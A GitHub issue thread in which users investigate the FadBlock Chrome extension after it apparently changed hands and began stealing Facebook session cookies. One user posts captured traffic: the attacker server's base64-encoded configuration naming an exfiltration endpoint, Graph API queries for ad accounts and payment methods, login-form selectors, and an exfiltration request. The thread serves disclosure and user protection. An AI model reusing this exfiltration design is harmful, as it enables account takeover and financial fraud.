DEFCON 1: DO NOT INSTALL / UNINSTALL 'FADBLOCK' IMMEDIATELY FROM YOUR CHROME

[JaielZeus]

The extension was updated over night and now needs more intrusive permissions on chrome to work again. I would like to know the reason why you need that @0x48piraj? I would think reading the data from youtube.com is already enough for this extension to work wouldn't you say so too? What is the reason here? I am really hesitant reenabling it and this suck, especially since I paid for premium and now the extension becomes intrusive like that.

[fabriziocarloni]

@0x48piraj What I would like to know for sure is what data is really sent to the fadblock.pro domain. In addition to the history of sites visited and I think the cookies of active sessions. I would like to make sure that nothing else is sent such as credentials stored on chrome or anything else. Please is there anyone among us who can do an in-depth analysis to definitively clarify this thing? I think knowing this is very important for all of us.

[twer1775]

@0x48piraj Hello, may I ask if it's possible for you to delete the registry key from the Windows Registry Editor or remove the specific string from the registry within the browser? Thank you for your efforts.

[0x48piraj]

Yeah, knowing the impact would help a lot @fabriziocarloni. As @poka-IT investigated, he ran and saw the outgoing/incoming requests and it seems like it doesn't exfil anything as of now. I found the same thing when I let it run in a separate profile. And there have been no new updates since the 24th.

I'm reading the code you provided, I don't see any malicious code on my side. External requests are only made on https://fadblock.pro/check/extension, with just fetching datas, doesn't seems to send anything there.

Response is

{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}

So probably just metadata for analytics as you said. Probably loggin IP address, that's it. But i'm just linux sys admin not security expert, maybe missed something.

@twer1775, I don't understand, what registry key? I don't think Windows Registry keys come into the scope of this project.

[fabriziocarloni]

@0x48piraj and @poka-IT I analyzed the computer where the extension with the malicious code was installed and I came to the conclusion that this extension most likely caused the hack. But please, I would like your help in finding concrete evidence because it could also help everyone else who has installed it. I don't think it's a coincidence that a few days after having given permission to read and modify all the data on all the websites we were hacked on Facebook. I really hope I'm wrong but I don't think so.

[0x48piraj]

@fabriziocarloni, I have submitted the malicious bit to various AV sandboxes - since I haven't delved into extensive JS reverse engineering before, it's taking some time to grasp the code. If anyone is willing to help, please feel free to contribute.

[poka-IT]

@0x48piraj I'm sorry but I don't want to act as a guarantor in this story, everything I did I wrote it here, because I had time to do this. I said i'm not security expert just sys admin, i deobfuscate the suspicious file and provided a first analyse, but I didn't "ran and saw the outgoing/incoming requests", I said this is what should be done. Or analyse the local storage state deeper.

I'm ok to contribute more but with one condition: Upgrade this repo to AGPLV3 license or equivalent. This in no way prevents you from continuing to ask for tips for your work. Actually there is no license, and the trade under is completely opaque. This is the only way you could expect contributors on this project.

[fabriziocarloni]

Thanks @0x48piraj I hope someone of good will wants to contribute to helping us understand what this extension really does. I see it as a challenge. I am not a security expert and if no one wants to help us discover the truth as soon as I have time I would like to try installing this extension with malicious code on a sandbox and with wireshark try to analyze the data traffic towards fadblock.pro for me it is important to understand it.

[seebeedub]

Maybe ask the current owner / developer what they did? They may be less malicious than we suspect they are

On Wed, Jan 31, 2024 at 6:42 AM Fabrizio @.***> wrote:

Thanks @0x48piraj https://github.com/0x48piraj I hope someone of good will wants to contribute to helping us understand what this extension really does. I see it as a challenge. I am not a security expert and if no one wants to help us discover the truth as soon as I have time I would like to try installing this extension with malicious code on a sandbox and with wireshark try to analyze the data traffic towards fadblock.pro for me it is important to understand it.

— Reply to this email directly, view it on GitHub https://github.com/0x48piraj/fadblock/issues/157#issuecomment-1918941116, or unsubscribe https://github.com/notifications/unsubscribe-auth/AXT63BC7UKNFSGGE337UCF3YRIU27AVCNFSM6AAAAABCILAJ22VHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTSMJYHE2DCMJRGY . You are receiving this because you commented.Message ID: @.***>

[fabriziocarloni]

@seebeedub If they have inserted malicious code that sends cookies with username and password to their servers I don't think they will ever be honest.

[MayouKurayami]

@0x48piraj

in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users.

Sure, to give you the benefit of the doubt, let's assume that you didn't expect the buyer to be malicious and also did not expect another change of hands.

But would you mind explaining why the user base was never informed of the change of ownership, a significant and potentially concerning event, prior to its occurrence?

[poka-IT]

@fabriziocarloni are you sure your facebook account have been hack ? Did you just received an SMS from "Facebook" giving you a 2fa code ? If yes, you have not been hack, just spam.

And I don't what you mean by "someone of good", but the good thing to do here is to declare this app as libre software, with a good license for. It seems that you have no problem using a program without an associated license?

[fabriziocarloni]

@poka-IT I'm an IT system engineer too and when I tell you that we were hacked it's the truth. The hack occurred with the copy of the active cookies and I am 100% sure of this.

I don't want to go into the licensing issue but I would just like to understand if this extension with malicious code sent other data besides cookies. That's all I would like to know.

[mnapoli]

The "sell licenses then resell the software shortly after" was a bad move IMO. Then unfortunate things happened, that's bad.

But thank you for handling things as best as you could have done after the bad things happened. Warning users, re-uploading the extension, and preserving licenses, was the hard but right step. I'm sure it wasn't easy for you, thank you.

[fabriziocarloni]

I analyzed the network traffic with wireshark and I confirm that the extension with the malicious code was designed to send active Facebook session cookies to the fadblock.pro 80.240.21.36 server to hack accounts. In fact, when you are connected to Facebook, data is sent continuously to their server, which is not the case with other sites.

Here is an example of what is sent:

:method: POST :authority: fadblock.pro :scheme: https :path: /check/extension content-length: 0 accept: application/json, application/xml, text/plain, text/html, . user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 content-type: application/json origin: chrome-extension://mdadjjfmjhfcibgfhfjbaiiljpllkbfc sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty accept-encoding: gzip, deflate, br accept-language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 cookie: XSRF-TOKEN=eyJpdiI6Im5BdVd0NDhkQ1JRWFo4RTRlVURxbXc9PSIsInZhbHVlIjoicU83OEtPa2JnV3Bib3RSSnpMcFhGYmlMMmdJSGhmRDQrSWJnM21JYUgrZjhMaWdmdWMrRXJXd1doWWxrcDBGUCIsIm1hYyI6IjRmYmNiMjkwNDYyNDE5ODUwZDcyZTgyMjhlMjA1YWRhNGVlYTU4ZWY1YzQwOTkyZTNhYTZjOGNlODVlM2UzZjQifQ%3D%3D cookie: laravel_session=eyJpdiI6IklkaEJVTEk5REtFMWdiWUMwRzZpT2c9PSIsInZhbHVlIjoiWTRNY3ZJV3pFVDE2T21aZWIwSDlRUTRidDdzMjdXSzEySnMwSjlqNXNoMTVpQnlIb29zR3RGXC9RTHVadXB4WEMiLCJtYWMiOiIwNTI0MzU2NzA5YWU1ZWY1OWI1YmU2ZTY1MzYzODgzYjZkYzcyOWU5NjRjMTgzZWI1NzNjYzU2OTE4YzUyYjIyIn0%3D

:status: 200 server: nginx content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.4.33 cache-control: no-cache, private date: Sat, 03 Feb 2024 02:35:44 GMT set-cookie: XSRF-TOKEN=eyJpdiI6IllkM3JmMDZ6b3VKRTQwOXdKUWdPMGc9PSIsInZhbHVlIjoibUNyZkttR1N5UEhqdVwvczhvZmtwa0JzODA1bHQzYTNBV3YraExZZW9qTEkxNFFJZGpmV25INW9cL2lHVUo2QUc0IiwibWFjIjoiMWY5YmM5ZmZmY2U2NTgwMjE2M2U2MGQ2OGExNzNlNzdjZmRjZDdmMjZiOGJiODdkY2ViOTVkNDkzMjIzMmRkOCJ9; expires=Sat, 03-Feb-2024 04:35:44 GMT; Max-Age=7200; path=/ set-cookie: laravel_session=eyJpdiI6Ims4ZGsxdm53TyswK2VpTDRRRjY5aXc9PSIsInZhbHVlIjoiWU10QzlcL0pZcnhYSk85UHhOK3U2MUFISmtTWFpwb1krSG5vMTU4U3NRZEV1VE1pWnZsZ0F4WlZFSFJzbEV6UkkiLCJtYWMiOiIwNWM5NmEwNWNhZGQyYWEzOTRiOGZmZTdmZGU5OWVlNDg1MTQ1YThkZmM1NmRhMjlmYjU3MGU0YjIxYzkwNmYzIn0%3D; expires=Sat, 03-Feb-2024 04:35:44 GMT; Max-Age=7200; path=/; httponly content-encoding: gzip

{"sstcode":403,"fad1":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9mYWRibG9ja1NhdmU=","fad2":"ZmFjZWJvb2suY29t","fad3":"Y29va2ll","fad4":"dXNlckFnZW50","fad5":"aHR0cHM6Ly9idXNpbmVzcy5mYWNlYm9vay5jb20vYWRzL2FkX2xpbWl0cw==","fad6":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvYnVzaW5lc3Nlcy8\/ZmllbGRzPWlkLG5hbWUsdmVyaWZpY2F0aW9uX3N0YXR1cyxjcmVhdGVkX3RpbWUsb3duZWRfYWRfYWNjb3VudHN7aWQsbmFtZSxhbW91bnRfc3BlbnQsaW5zaWdodHMuZGF0ZV9wcmVzZXQobWF4aW11bSl7c3BlbmR9LGFjY291bnRfY3VycmVuY3lfcmF0aW9fdG9fdXNkLHNwZW5kX2NhcCxjdXJyZW5jeSxhY2NvdW50X3N0YXR1cyxhZHNwYXltZW50Y3ljbGV7dGhyZXNob2xkX2Ftb3VudH0sZnVuZGluZ19zb3VyY2VfZGV0YWlscyxhZHRydXN0X2RzbCxhbGxfcGF5bWVudF9tZXRob2Rze3BtX2NyZWRpdF9jYXJke2Rpc3BsYXlfc3RyaW5nLGV4cF9tb250aCxleHBfeWVhcn0scGF5bWVudF9tZXRob2RfZGlyZWN0X2RlYml0c3tjYW5fdmVyaWZ5LGRpc3BsYXlfc3RyaW5nLGlzX2F3YWl0aW5nLGlzX3BlbmRpbmcsc3RhdHVzfSxwYXltZW50X21ldGhvZF9wYXlwYWx7ZW1haWxfYWRkcmVzc319fSxvd25lZF9wYWdlc3tpZCxuYW1lLGZvbGxvd2Vyc19jb3VudCx2ZXJpZmljYXRpb25fc3RhdHVzfSxwZXJtaXR0ZWRfcm9sZXMsYnVzaW5lc3NfdXNlcnN7ZW1haWwscGVuZGluZ19lbWFpbCxuYW1lLHJvbGV9JmFjY2Vzc190b2tlbj0=","fad7":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvP2ZpZWxkcz1uYW1lLGJpcnRoZGF5JmFjY2Vzc190b2tlbj0=","fad8":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvYWRhY2NvdW50cz9maWVsZHM9YWNjb3VudF9jdXJyZW5jeV9yYXRpb190b191c2QsbmFtZSxhY2NvdW50X3N0YXR1cyxjdXJyZW5jeSxmdW5kaW5nX3NvdXJjZV9kZXRhaWxzLGFtb3VudF9zcGVudCxpbnNpZ2h0cy5kYXRlX3ByZXNldChtYXhpbXVtKXtzcGVuZH0sYnVzaW5lc3MsYWRzcGF5bWVudGN5Y2xlLHNwZW5kX2NhcCxhZHRydXN0X2RzbCwgYWxsX3BheW1lbnRfbWV0aG9kc3twbV9jcmVkaXRfY2FyZCB7ZGlzcGxheV9zdHJpbmcsIGV4cF9tb250aCwgZXhwX3llYXJ9LHBheW1lbnRfbWV0aG9kX2RpcmVjdF9kZWJpdHMge2Nhbl92ZXJpZnksIGRpc3BsYXlfc3RyaW5nLCBpc19hd2FpdGluZywgaXNfcGVuZGluZywgc3RhdHVzfSxwYXltZW50X21ldGhvZF9wYXlwYWwge2VtYWlsX2FkZHJlc3N9fSZhY2Nlc3NfdG9rZW49","fad9":"RUFB","fad10":"aW5wdXRbbmFtZT0icGFzcyJd","fad11":"aW5wdXRbbmFtZT0iZW1haWwiXQ==","fad13":"Zm9ybQ==","fad14":"cXIvc2hvdy9jb2Rl","fad15":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9zYXZlUVI=","fad12":"aHR0cHM6Ly9mYWNlYm9vay5jb20vbWU=","fad16":"YQ==","fad17":"Y2xpY2s=","fad18":"c3Jj","fad19":"aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3NlY3VyaXR5LzJmYWMvc2V0dGluZ3Mv","fad20":"bG9naW4vcmVhdXRo"}

[fabriziocarloni]

The serious thing is that anyone who installs the extension with malicious code for the first time does not receive any notification regarding the increase in required permissions, which instead happened with the update. For now I am sure that this extension is activated to steal session cookies from Facebook but I do not exclude that it could also happen from other sites that I have not yet had the opportunity to test.

[fabriziocarloni]

When you are logged in to Facebook, the extension with the malicious code also sends the user's data including financial data to the api.fadblock.pro 149.248.56.63 server:

:method: POST :authority: api.fadblock.pro :scheme: https :path: /api/fadblockSave content-length: 1515 accept: application/json, application/xml, text/plain, text/html, . user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 content-type: application/json origin: chrome-extension://mdadjjfmjhfcibgfhfjbaiiljpllkbfc sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty accept-encoding: gzip, deflate, br accept-language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7

{"fad":"RUFBNmtVNDlVelhJQk9aQ0swWkJXWkNNSHdkRWVNQjl6WVg3TU9xTWYzRDZuSDRKWkJyd3F6bldwd3NJRlN0T043OEVyNkFPN3dYUEdBNGlwYzJkeHQyUzJHSHlXdkhidmpWNm5rdlFKNkNPTjZEeHlld0R2NlBZSVBqbWdZeWJaQkRPeDdDcnpzdEo2NmRscUtwSGVwWTZlOGRycURaQ1NMeEhTbWdyNEIyOVU2STFqd29QemlYZnZUR1dpY3ZTMDJjT0FaRFpEIF9fIFpHRjBjajF4V0ZjdFdsWm9SM3BGUVdReVdWSklhbUp4VjBreVVWYzdJSE5pUFhrelZ5MWFaV1JQUkZsck5FWklXVGgxTWpCSk5XOTVZVHNnWTE5MWMyVnlQVFl4TlRVMk1EUTVOemcxTXpRMU95QjRjejAxSlROQlQweEZTbEZWVHpSaFRFWlNWRUVsTTBFeUpUTkJNVGN3TmprNE1EZ3hNU1V6UVMweEpUTkJMVEU3SUhka1BURXpOalo0TmpReE95QndjbVZ6Wlc1alpUMURKVGRDSlRJeWRETWxNaklsTTBFbE5VSWxOVVFsTWtNbE1qSjFkR016SlRJeUpUTkJNVGN3TmprNE1EZ3hOelEzTUNVeVF5VXlNbllsTWpJbE0wRXhKVGRFT3lCdmJ6MTJNU1UzUXpNbE0wRXhOekEyT1Rnd09ESXcgX18gVFc5NmFXeHNZUzgxTGpBZ0tGZHBibVJ2ZDNNZ1RsUWdNVEF1TURzZ1YybHVOalE3SUhnMk5Da2dRWEJ3YkdWWFpXSkxhWFF2TlRNM0xqTTJJQ2hMU0ZSTlRDd2diR2xyWlNCSFpXTnJieWtnUTJoeWIyMWxMekV5TVM0d0xqQXVNQ0JUWVdaaGNta3ZOVE0zTGpNMiBfXyA2MTU1NjA0OTc4NTM0NSBfXyBleUp1WVcxbElqb2lVbTl0WVc1dklFZGxibTkyWlhOcElpd2lhV1FpT2lJMk1UVTFOakEwT1RjNE5UTTBOU0lzSWw5ZlptSmZkSEpoWTJWZmFXUmZYeUk2SWtkWVZGWjNOazlhZVZSMElpd2lYMTkzZDNkZmNtVnhkV1Z6ZEY5cFpGOWZJam9pUVRoUk9FeDBiMU5vVDFKRWJqQm9NM05IYmxNNVMwTWlmUT09IF9fIFZISnBNaUZaWlhjZ2ZDQnliMjFoYm04dVoyVnViM1psYzJsQWIzVjBiRzl2YXk1amIyMD0gX18gMA==","fad_ana":"[]","fad_context":"[{\"account_currency_ratio_to_usd\":0.9303347825,\"name\":\"Name Surname\",\"account_status\":1,\"currency\":\"EUR\",\"amount_spent\":\"0\",\"spend_cap\":\"0\",\"adtrust_dsl\":46.52,\"id\":\"act_429256876109265\"}]"}.............:status: 200 server: nginx content-type: application/json x-powered-by: PHP/7.4.33 cache-control: no-cache, private date: Sat, 03 Feb 2024 17:20:23 GMT x-ratelimit-limit: 600 x-ratelimit-remaining: 599 access-control-allow-origin: *

{"message":"Verified","stt":false}

Now there is no longer any doubt that the hack we had was caused by this extension with malicious code looking for Facebook accounts with a credit card connected to then advertise by spending the money of unsuspecting users. This is all very heavy.

[fabriziocarloni]

@0x48piraj This should be reported to Google to have the extension with the malicious code removed immediately. It cannot be left so downloadable by everyone. Please do everything you can to have it removed.

[JustinGITUB]

How to completed uninstall fadblock or fadblock original? thanks for advise.

[fabriziocarloni]

@JustinGITUB To completely uninstall fadblock just remove this extension from chrome.

[0x48piraj]

@fabriziocarloni, I have emailed everyone who supported to report the extension days before.

[fabriziocarloni]

@0x48piraj Unfortunately what you did isn't enough. Before it does any more damage, everything must be done to ensure that Google removes the extension with malicious code from the Chrome web store. Whoever manages this extension has no shame and look what they added in the description. I have no words.

"UPDATE: If you were an user before the update and the extension got disabled, that's normal behavior by Google, it's so an extension can't silently escalate its privileges with an update, in this case FadBlock accessing extensionpay.com for those who want to contribute, nothing else. Nothing to be scared about. You can read the new permissions to make sure nobody's pulling any funny business.

NOTE: And for those who are alarmed about the "Read and change your data" permission, it's not accessing any of your data, it's just to access the YouTube and YouTube Music (new feature!) tabs as it was doing before. You can read the documentation to make sure that's the case,

This is the permission required for an extension to work with the browser's tabs. This includes viewing the URL of an open tab. The permission does not give access to your actual browser history itself, but technically any extension with this permission could monitor tab URLs as they changed and construct its own history, so that's why the warning is phrased that way. If an extension asks for permission to access the actual browser history data, the warning should read "Read and change your BROWSING HISTORY...".

https://developer.chrome.com/docs/extensions/mv3/permission_warnings/

You can google this and find out, no need to trust the developer."

[fabriziocarloni]

@0x48piraj I did my part by demonstrating that that malicious code doesn't just send the Chrome history but does something more important by sending cookies from active sessions on Facebook to then easily hack the accounts. But now it's up to you to do everything you can to get Google to remove it from its Chrome Web Store. I don't want what happened to us to happen to others.

[Nicos18]

@fabriziocarloni In the last few days I was receiving several emails in different occasions because someone asked to reset my password (not me).

Maybe the 2FA on my account avoided the issue.

Is this connected to the extension or it could be something else?

Uhm...

[fabriziocarloni]

@Nicos18 We also had 2FA active but when they copy you the cookies replicate the connection you have (in our case to Facebook) and to enter your account they don't even need a password and you realize the damage when it's too late. I believe the only salvation is the use of a physical key like passkey which should protect you from this type of attacks.

[Rynn21]

I disabled the extension over a month ago because it was repeatedly asking for a donation. Today Chrome comes up with this, so I deleted the extension entirely. AdNauseum is so good. Haven't looked back for awhile. Fadblock has been sketchy from the start.

[fabriziocarloni]

@Rynn21 I'm glad that Chrome finally sees this as an extension that contains malware. I just hope they delete it from the Chrome Web Store as soon as possible otherwise it will continue to cause damage.

[fabriziocarloni]

It appears that the version of fadblock with malicious code has been removed from the Chrome Web Store (see https://chromewebstore.google.com/detail/fadblock-friendly-adblock/mdadjjfmjhfcibgfhfjbaiiljpllkbfc). I hope it's not a coincidence and that it's true.

[Rynn21]

No one should install anything named Fadblock again. Change your passwords too.

[fabriziocarloni]

@Rynn21 The original extension had changed hands and was then modified with malicious code. After this bad experience I will pay much more attention to the extensions to install on Chrome.

[WongIong]

What can we do right now? Does changing password also invalid your cookies? @fabriziocarloni

[Rynn21]

@Rynn21 The original extension had changed hands and was then modified with malicious code. After this bad experience I will pay much more attention to the extensions to install on Chrome.

Yes. A lot of people online are sharing the extent of how sketchy the extension was and is, including things about the author.

[fabriziocarloni]

@WongIong When a user changes own password the authorize cookies that were created earlier still work. In the specific case of Facebook you should connect to this page https://accountscenter.facebook.com/password_and_security and disconnect all active sessions and then also change the password for security.

[moemisaka9]

Does the malicious code do anything on websites other than Facebook? If I didn't use Facebook at all before I uninstall the extension today should I worry about anything?

[fabriziocarloni]

@moemisaka9 It was certainly active in stealing session cookies from Facebook. However, I don't rule out that it was also active for other sites that I didn't have the opportunity to test.

[Nicos18]

As a precaution, I logged out from all sessions and changed password for both Facebook and Instagram, as they are deeply connected.

I can't change passwords on other sites as I have too password to change and it would've take weeks.

[Rynn21]

Hmm...some thread comments appear to be deleted compared to the e-mailed updates I saw.

[SAABoy]

@Rynn21 are you sure you didn't skip past a "load more" button? Here's a pic.

[Rynn21]

@Rynn21 are you sure you didn't skip past a "load more" button? Here's a pic.

Positive.

[That1BlueMew]

@Rynn21 oh i sent one item here and deleted it cuz i thought it was not needed here if thats what your talking about

[Panadoc]

Any news what data/sites was compromised? (other than facebook)

[Cynosphere]

I am no longer the owner of the extension. I sold it over a month ago

First the open core stunt and then you sold the extension and didn't expect it to be riddled with malware??? There's no way you're this money starved to be this incompetent. I'm glad I took matters into my own hands to just use the userscript whenever YouTube keeps trying to block uBlock.

This is why I absolutely hate small things that could be userscripts being full extensions and cringe everytime I see people with Return YouTube Dislike as an extension (though I really wish they would stop neglecting the userscript).

You got what you deserved honestly. Just a shame you had to bring down innocent people with you.

[Rynn21]

@Rynn21 oh i sent one item here and deleted it cuz i thought it was not needed here if thats what your talking about

It was someone else, but they probably deleted their chain of replies.

[MGuerrera]

@0x48piraj have you finished inspecting the code? Are there any other websites we should be worried about besides Facebook and Instagram?

[MGuerrera]

@0x48piraj have you finished inspecting the code? Are there any other websites we should be worried about besides Facebook and Instagram?

@0x48piraj I need to have an answer, the threat is serious.

I need to know if I have to start changing dozens and dozens of passwords.

[0x48piraj]

@MGuerrera, the extension was deleted about a week ago - because of my efforts going back and forth with Google Devs and making them manually review and remove the extension as it would have taken months otherwise because of the positive reviews and downloads.

If you were in danger, you would have already gotten breach emails like some did - if not - you're safe - it was scrubbed under a week after the update - their server wasn't even online on the first two days - so the exposure was low, to begin with, thankfully.

[0x48piraj]

Now that the extension was removed globally, there's no reason to keep the issue alive. Closing.